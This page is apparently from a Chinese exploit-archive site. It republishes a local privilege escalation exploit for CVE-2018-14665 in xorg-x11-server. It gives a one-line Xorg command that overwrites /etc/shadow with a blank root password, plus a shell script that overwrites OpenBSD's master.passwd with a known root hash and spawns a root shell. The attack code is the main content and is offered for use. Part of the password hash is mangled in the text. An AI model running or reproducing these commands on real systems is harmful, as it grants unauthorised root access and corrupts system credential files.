首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
xorg-x11-server Local Privilege Escalation
来源:hackerfantastic at googlemail.com 作者:Fantastic 发布时间:2018-10-29  
#CVE-2018-14665 - a LPE exploit via http://X.org  fits in a tweet
 
cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su
 
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
 
 
 
 
 
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b___FCKpd___08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -
 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·libtiff 4.0.9 - Decodes Arbitr
·xorg-x11-server Local Root
·Adult Filter 1.0 - Buffer Over
·Linux systemd Line Splitting
·BORGChat 1.0.0 build 438 - Den
·Linux systemd Symlink Derefere
·WebExec Authenticated User Cod
·ASRock Drivers Privilege Escal
·WebEx Local Service Permission
·WordPress Arforms 3.5.1 Arbitr
·Apache OFBiz 16.11.04 - XML Ex
·Linux mremap() TLB Flush Too L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved